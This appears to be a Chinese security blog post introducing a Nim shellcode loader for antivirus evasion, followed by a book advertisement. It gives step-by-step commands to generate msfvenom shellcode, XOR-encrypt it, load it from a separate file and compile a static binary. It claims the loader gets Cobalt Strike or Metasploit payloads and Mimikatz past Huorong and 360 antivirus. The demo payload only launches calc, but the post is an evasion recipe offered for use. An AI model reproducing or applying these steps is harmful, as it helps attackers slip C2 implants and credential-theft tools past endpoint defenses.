===================================
0x01 工具介绍
免杀效果:h绒、36x(未开核晶)均联网,读入 Msfvenom 或 Cobalt Strike 等 C2 的 Shellcode 方式分离免杀,或者配合 donut 可以将 exe、dll 转为 Shellcode 载入 MimiKatz 等工具。
0x02 安装与使用
一、在 windows 配置 nim 环境。官网下载 https://nim-lang.org/install_windows.html
https://nim-lang.org/download/nim-2.0.0_x64.zip
二、msfvenom 生成 shellcode
msfvenom -a x64 -p windows/x64/exec CMD=calc -f raw -o calc_x64.bin
三、xor 加密 msfvenom 生成的 raw 格式 shellcode
> python .\xorencrypt.py .\calc_x64.bin
> xor encrypted : .\calc_encrypted.bin
四、将加密后的文件名作为参数传递给 nim 文件中的 fopen 参数
//修改这里
char key[] = "key";
//修改这里
fp = fopen("user.dat", "rb");
五、编译
nim c -d=mingw --app=gui --cpu=amd64 -d:release --opt:size --passL:-static .\x2Ldr.nim
六、效果
· 今 日 推 荐 ·
京东购买链接:https://item.jd.com/13971514.html
本书可当作一本工具书使用,遇到类似问题时,可以挑选其中任何所需章节进行参考。第1部分主要介绍了企业网络安全管理体系的领域特色、行业特色以及方法论中的某些重点,对网络安全管理、团队建设、企业治理、行业协作等问题之间的联系进行了深入探讨,有助于读者从宏观视角理解网络安全问题的整体。第2部分主要介绍了一些具体实务的操作方法,包括设防、侦查、接敌、应战、取胜等实际工作中的内容;也包括一些开放式的探讨,例如安全运营、应急响应以及从业者自身发展等内容。这些内容对企业的网络安全负责人更好地掌控全局或对企业的网络安全技术人员更好地认知自身价值都具有积极意义。第3部分主要介绍了一些真实的实践案例,在此基础上探讨了企业网络安全管理体系运行过程中可能遇到的典型问题及其解决方案。